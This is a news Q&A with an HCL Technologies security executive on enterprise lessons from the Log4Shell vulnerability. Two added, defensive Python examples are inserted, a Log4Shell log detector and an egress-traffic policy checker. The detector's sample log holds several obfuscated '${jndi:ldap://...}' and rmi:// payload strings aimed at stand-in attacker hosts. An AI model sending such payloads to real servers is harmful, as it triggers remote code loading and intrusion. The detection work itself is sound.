What Log4Shell still means for the enterprise [Q&A]
When the Log4Shell vulnerability first appeared at the end of last year it sent a shockwave through the cybersecurity community.
But just because it's no longer in the headlines doesn't mean it's gone away. There's still a lot that enterprises can learn from the vulnerability and the response to it. We spoke to Maninder Singh, corporate vice president and global head of cybersecurity and GRC services at HCL Technologies, to find out more.
BN: Log4Shell won't be the last security vulnerability to be discovered and exploited, so how can enterprises put themselves in a position to deal with this kind of threat in the future?
MS: At a fundamental level, securing organizational IT systems should not be approached in a reactive way. Instead, dealing with critical IT incidents, such as cyberattacks or systems breaches, should be a proactive, integrated part of any disaster recovery and business continuity plan.
However, as the Log4Shell vulnerability has demonstrated, there will always be blind spots in interdependent connected systems. The unpredictability of emergency scenarios emphasizes the need for a holistic, capabilities-based approach, building in the ability to adapt to a variety of challenges. It is important for organizations to have a complete view over their software supply chain by tracking all their assets.
There's a lot to take in, so enterprises may be left wondering where to begin. Each organization is structured differently, but most would benefit either from the creation of an incident response group or from understanding how a Managed Security Provider (MSP) could assist such a group.
BN: How can incident response teams help?
MS: From the outset, it is vital to define a recovery strategy to isolate and mitigate emergency triggers, preserve critical systems, secure data, and migrate to backup systems for business continuity. Incident response teams should start by identifying all software assets and classifying them into two categories -- vendor-provided software and in-house software. If the technology is vendor-owned, it is likely organizations will need to rely on their guidance and updates to patch the software.
Applications built in-house should be scanned with a software composition analysis (SCA) tool to assess the vulnerability. Any systems that are externally facing, like websites or servers, need to undergo a mitigation process, while web application firewall rules should be updated to detect exploit activities.
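The "update web application firewall rules to detect exploit activities" step above is easy to get wrong for Log4Shell, because the attack string does not have to arrive as a literal `${jndi:`. The following is an added example, not code from the interview or from HCL: it normalizes URL-encoding and the common Log4j lookup obfuscations (`${::-j}` default-value tricks, `${lower:}`/`${upper:}`) before matching, and runs over constructed web server log lines. Function and variable names are assumptions; the log lines are constructed for the example.

```python
"""Detect Log4Shell-style ${jndi:...} lookups in web server log lines.

Added example; not part of the interview. The sample log lines below are
constructed, and the obfuscation handling covers the common evasions seen in
the wild (URL-encoding, ${::-x} default-value tricks, ${lower:}/${upper:}),
not every possible variant.
"""
import re
import urllib.parse
from typing import List, Optional

# ${::-x} (or ${:-x}) is a lookup with an empty name whose default value is x:
# Log4j evaluates it to the literal "x", so attackers spell "jndi" this way.
_DEFAULT_ONLY = re.compile(r"\$\{\s*:{1,2}-([^${}]*)\}")
# Innermost ${name:body} lookups (body contains no nested ${...}).
_LOOKUP = re.compile(r"\$\{\s*([a-z0-9]+)\s*:([^${}]*)\}", re.I)
# What we are looking for once the obfuscation is undone.
_JNDI_URI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)://([^\s/}]+)", re.I)


def _resolve_lookup(m) -> str:
    name, body = m.group(1).lower(), m.group(2)
    if name == "jndi":
        return m.group(0)                 # keep; this is what we detect
    if ":-" in body:
        return body.rsplit(":-", 1)[1]    # ${env:UNSET:-j} -> "j"
    if name == "lower":
        return body.lower()
    if name == "upper":
        return body.upper()
    return m.group(0)                     # unknown lookup, no default: leave it


def normalize(text: str, max_rounds: int = 10) -> str:
    """Undo URL-encoding and resolve nested lookups inside-out so the string
    reads as Log4j would have evaluated it."""
    for _ in range(3):                    # handle double/triple encoding
        decoded = urllib.parse.unquote(text)
        if decoded == text:
            break
        text = decoded
    for _ in range(max_rounds):
        new = _DEFAULT_ONLY.sub(lambda m: m.group(1), text)
        new = _LOOKUP.sub(_resolve_lookup, new)
        if new == text:
            break
        text = new
    return text


def inspect(text: str) -> Optional[dict]:
    """Return details of a JNDI lookup in text, or None if there is none."""
    norm = normalize(text)
    m = _JNDI_URI.search(norm)
    if not m:
        return None
    return {"scheme": m.group(1).lower(), "host": m.group(2), "normalized": norm}


def scan_log(lines: List[str]) -> List[dict]:
    """Scan whole log lines: URI, headers and User-Agent all land in the line."""
    hits = []
    for n, line in enumerate(lines, start=1):
        found = inspect(line)
        if found:
            hits.append({"line": n, **found})
    return hits


# Constructed sample: three exploit attempts with increasing obfuscation,
# then a benign request whose query string merely contains "${".
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Dec/2021:13:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.23:1389/a}"',
    '203.0.113.7 - - [10/Dec/2021:13:01:03 +0000] "GET /login?user=%24%7B%24%7B%3A%3A-j%7Dndi%3Aldap%3A%2F%2Fevil.example%3A1389%2Fx%7D HTTP/1.1" 404 0 "-" "curl/7.79.1"',
    '203.0.113.7 - - [10/Dec/2021:13:01:04 +0000] "GET /api HTTP/1.1" 200 88 "-" "Mozilla/5.0 ${${lower:j}${upper:n}${lower:d}i:${lower:r}mi://198.51.100.23:1099/obj}"',
    '198.18.0.5 - - [10/Dec/2021:13:01:05 +0000] "POST /search?q=price%20%24%7B100%7D HTTP/1.1" 200 20 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"line {hit['line']}: {hit['scheme']}:// -> {hit['host']}")
```

The same normalize-then-match logic is what a WAF rule or SIEM query needs to do; a rule that only matches the literal `${jndi:` misses the second and third lines above. The extracted scheme and host also give the incident response team the callback servers to block at the egress.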
BN: How else can you protect your organization against unknown risks?
MS: Zero-day exploits are vulnerabilities that are targeted before they have been discovered by the security community, which makes them very difficult to detect and block. The Log4Shell vulnerability is a perfect example of one of these.
To mitigate the threat of zero-day exploits, organizations must focus on implementing security best practices. It's important to carry out periodic assessments to identify any vulnerabilities in the environment. This means if any are found, organizations can implement a patch management strategy. The attack surface can also be reduced by implementing security controls like next generation antivirus and endpoint detection and response solutions, to protect against infections that target Java scripts or objects.
An organization can protect its network by implementing web application firewalls and intrusion prevention systems. Outbound network traffic must be evaluated based on host name and IP reputation, and any network connection to un-trusted destinations should be terminated. It is also a good idea to monitor unexpected traffic to ensure it is legitimate.
Essentially, businesses need to prevent the spread of risks by limiting connections only to those required for business needs. This will mitigate the spread of an exploit within the organization after initial infection, by controlling access to systems and folders with privilege restrictions.
Even with these measures in place, organizations can still be infected by a zero-day exploit. To minimize damage, well-planned incident-response measures, with defined roles and procedures including prioritization of mission-critical activities, are crucial along with user awareness and continuous training to avoid falling into the trap of malicious actors/activities.
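The outbound-traffic control described above (evaluate destinations by hostname and IP reputation, terminate connections to untrusted destinations, and review anything unexpected) can be expressed as a small egress policy. The following is an added example and not code from the interview or from HCL: it triages constructed connection records against a per-host allowlist and a reputation denylist, and additionally terminates LDAP/RMI connections to any destination not on the allowlist, since those are the ports a Log4Shell JNDI callback uses. The allowlist, denylist, record format and names are all assumptions made for the example.

```python
"""Egress policy check for application hosts.

Added example; not part of the interview. Allowlist, denylist and the sample
connection records are constructed. A real deployment would pull the
reputation list from a threat-intel feed and enforce the verdict in the
firewall or proxy; this code only produces the decision.
"""
import ipaddress
from dataclasses import dataclass
from typing import List, Tuple

# Per-host allowlist of expected destinations (hostnames or CIDRs). Constructed.
ALLOWED_DESTINATIONS = {
    "app-01": {"db.internal.example", "10.0.20.0/24", "updates.vendor.example"},
}
# Destinations with bad reputation (constructed stand-in for a threat-intel feed).
BAD_REPUTATION = {"198.51.100.23", "203.0.113.0/24"}
# Ports used by ldap://, ldaps:// and rmi:// JNDI callbacks. An application
# server has no business opening these to arbitrary destinations, so such a
# connection is terminated even if the destination has no bad reputation yet.
JNDI_PORTS = {389, 636, 1389, 1099, 1098}


@dataclass
class Connection:
    timestamp: str
    src_host: str
    process: str
    dst: str      # hostname or IP address
    dport: int


def _matches(dst: str, entry: str) -> bool:
    """Match a destination against a list entry (CIDR or exact name)."""
    if "/" in entry:
        try:
            return ipaddress.ip_address(dst) in ipaddress.ip_network(entry)
        except ValueError:      # dst is a hostname, not an address
            return False
    return dst.lower() == entry.lower()


def evaluate(conn: Connection) -> Tuple[str, str]:
    """Return (verdict, reason); verdict is allow, terminate or monitor."""
    if any(_matches(conn.dst, e) for e in BAD_REPUTATION):
        return "terminate", "destination on reputation denylist"
    allowed = ALLOWED_DESTINATIONS.get(conn.src_host, set())
    if any(_matches(conn.dst, e) for e in allowed):
        return "allow", "destination on allowlist"
    if conn.dport in JNDI_PORTS:
        return "terminate", "LDAP/RMI connection to untrusted destination"
    return "monitor", "not on allowlist; review"


def parse_line(line: str) -> Connection:
    """Parse 'TIMESTAMP SRC_HOST PROCESS DST DPORT' (constructed format)."""
    ts, src, proc, dst, port = line.split()
    return Connection(ts, src, proc, dst, int(port))


def triage(lines: List[str]) -> List[Tuple[str, str, str]]:
    """Return (dst, verdict, reason) for each connection record."""
    out = []
    for line in lines:
        conn = parse_line(line)
        verdict, reason = evaluate(conn)
        out.append((conn.dst, verdict, reason))
    return out


# Constructed records: normal database and update traffic, a callback to a
# known-bad host, a callback to an unknown host, and an unexplained HTTPS flow.
SAMPLE_CONNECTIONS = [
    "2021-12-10T13:01:05Z app-01 java 10.0.20.15 5432",
    "2021-12-10T13:01:05Z app-01 java updates.vendor.example 443",
    "2021-12-10T13:01:06Z app-01 java 198.51.100.23 1389",
    "2021-12-10T13:01:07Z app-01 java 192.0.2.44 1389",
    "2021-12-10T13:01:08Z app-01 java 192.0.2.9 443",
]

if __name__ == "__main__":
    for dst, verdict, reason in triage(SAMPLE_CONNECTIONS):
        print(f"{verdict:9} {dst:24} {reason}")
```

The fourth record is the interesting one: the destination has no reputation history, so a denylist-only control would pass it, but the port alone is enough to terminate it and raise an alert. The last record is exactly the "unexpected traffic" the answer says should be monitored rather than silently allowed.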
BN: What are the critical monitoring points for IT infrastructure?
MS: No one point in the IT infrastructure is more important than the rest. As the old saying goes, the chain is only as strong as its weakest link. In this case, one weakness left unattended can collapse an entire security system, especially those that are increasingly complex. That's why it's important to emphasize a holistic approach in IT infrastructure, which is the backbone of any modern enterprise.
In terms of monitoring, it's important to recognize the increasing complexity of hybrid environments, especially with regards to their threat exposure on the cloud and third-party access. With a variety of cloud platforms and native monitoring solutions, gaps in visibility can result in significant security threats. For organizations shifting to a microservices-based architecture with native cloud solutions, it's best to partner with an MSP for cybersecurity solutions, so they can benefit from a dedicated team led by industry best practices.
BN: What value can outside experts bring in this type of situation?
MS: Enlisting an MSP is no longer just about efficiency and capacity enhancement, but also about winning the 'knowledge game'. While there are natural benefits to shifting to an OpEx model, it also allows organizations to focus on their core competencies.
By partnering with an MSP, organizations can leverage high level expertise in continuous system monitoring, by taking advantage of advanced automation solutions, proactive alerts and expert resources for threat mitigation.
Experienced MSPs can help organizations adopt best-of-breed technology solutions while also acquiring process roadmaps that align with their business goals. Such a partner can provide a single source of truth to the organization that seamlessly integrates with its DevOps team to save time, improve efficiency, and allow organizations to focus on their core business.